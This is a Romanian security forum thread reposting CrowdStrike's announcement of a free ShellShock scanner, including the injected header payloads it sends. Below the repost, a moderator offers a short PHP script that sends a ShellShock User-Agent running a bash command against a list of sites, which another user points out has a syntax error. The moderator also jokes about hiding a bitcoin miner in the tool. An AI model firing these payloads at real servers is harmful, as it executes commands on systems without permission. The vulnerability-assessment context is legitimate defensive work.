Jump to content
Nytro

CrowdStrike ShellShock Scanner

By Nytro, in Programe hacking

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

CrowdStrike ShellShock Scanner – New Community Tool

The Tool Box 30 Sep 2014 Dmitri Alperovitch

A large number of ShellShock online vulnerability scanners have been released since the bug disclosure on September 24. These tools can be great for scanning external web servers, however, just as we’ve seen with the Heartbleed scanners, there is a real unfilled need for a tool that can be easily used to scan for vulnerable internal systems, in addition to the external servers. While Unix gurus can fairly easily write scripts to accomplish this task, many prefer to have an easy to use Windows GUI tool to simplify the vulnerability assessment process.

And so after once again having put Robin Keir, our toolbuilder extraordinaire, on the case, we are proud to announce CrowdStrike ShellShock Scanner as our latest free community tool. As with our Heartbleed scanner, the tool can import a list of IP ranges or website URLs to scan. Multiple port ranges can be selected and the results can be saved in CSV, HTML, XML or text format.

ShellShock-screenshot.png

Unfortunately network-based scanning for vulnerable ShellShock servers is nowhere as easy as identifying the Heartbleed servers since the triggering of execution of the bash shell is usually very specific to each application. Even to effectively scan HTTP servers, one needs to know the path to all of the CGI scripts that are dependent on bash and sometimes even the specific GET or POST parameters that need to be supplied to the script in order to trigger the vulnerability. We have preloaded the scanner with almost 400 common CGI paths that will be attemped during the full scan and have allowed the import of additional paths to test custom or less popular CGI applications.

The scanner works by sending an HTTP GET request to each pre-configured CGI path of the scanned target with the following headers:

Cookie: () { :; }; echo -e "\r\n\r\n<random string>"

Referer: () { :; }; echo -e "\r\n\r\n<random string>"

User-Agent: CrowdStrike ShellShock Scanner/1.0

Test: () { :; }; echo -e "\r\n\r\n<random string>"

When the CGI script launches bash with the supplied environment parameters, it should trigger the execution of the echo command on a vulnerable system. With most scripts, the random string in the output of the echo command will be sent back in the body of the HTTP response, allowing the scanner to detect it and deem the system vulnerable. We deliberately picked the innocuous echo command as the one to execute by the scanner so as to minimize the chance of the scan doing anything harmful to the vulnerable target.

Please note that even a full internal and external IP range scan of your network will not provide you with a complete assurance that you are not vulnerable to ShellShock.

In addition to the limitations of scanning CGI applications, this scanner is not able to determine the vulnerability of SMTP servers or DHCP clients to the bug. Nor is it able to be used to test for privilege escalation vulnerabilities via SSH or on local Unix and OSX systems. It is still paramount that you apply patches across your entire population of systems that utilize bash shell as soon as possible.

You can download CrowdStrike ShellShock Scanner here.

Sursa: CrowdStrike ShellShock Scanner – New Community Tool | Adversary Manifesto

Link to comment
Share on other sites
  • Moderators
Dragos Collaborator

Dragos

Posted
  • Moderators
Posted

Asta e de script-kiddie. Eu in locul developerului as fi pus si un script de minat bitcoini in aplicatie ca daca tot descarca copiii, macar sa fac si eu un ban cinstit.

Mai rapid se poate face asa din consola.


<?php
$situri = array("http://site.ro/","http://site2.ro");

foreach($situri as $sit)
{
	if(scaneaza($sit))
		echo $sit . "\n";
}


function scaneaza($url)
{
	  $cmd = "ls";

	  $context = stream_context_create(
	    array(
	      'http' => array(
		'method'  => 'GET',
		'header'  => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
	      )
	    )
	  if(!file_get_contents($url, false, $context) && strpos($http_response_header[0],"500") > 0)
	    return 1;
	  else
	    return 0;
}
?>

Link to comment
Share on other sites
Gotyc Newbie

Gotyc

Posted
Posted

Mai rapid se poate face asa din consola.


<?php
$situri = array("http://site.ro/","http://site2.ro");

foreach($situri as $sit)
{
	if(scaneaza($sit))
		echo $sit . "\n";
}


function scaneaza($url)
{
	  $cmd = "ls";

	  $context = stream_context_create(
	    array(
	      'http' => array(
		'method'  => 'GET',
		'header'  => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
	      )
	    )
	  if(!file_get_contents($url, false, $context) && strpos($http_response_header[0],"500") > 0)
	    return 1;
	  else
	    return 0;
}
?>

Ai mancat vreo 2 ))

la $context = ))); la sfarsit:))

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...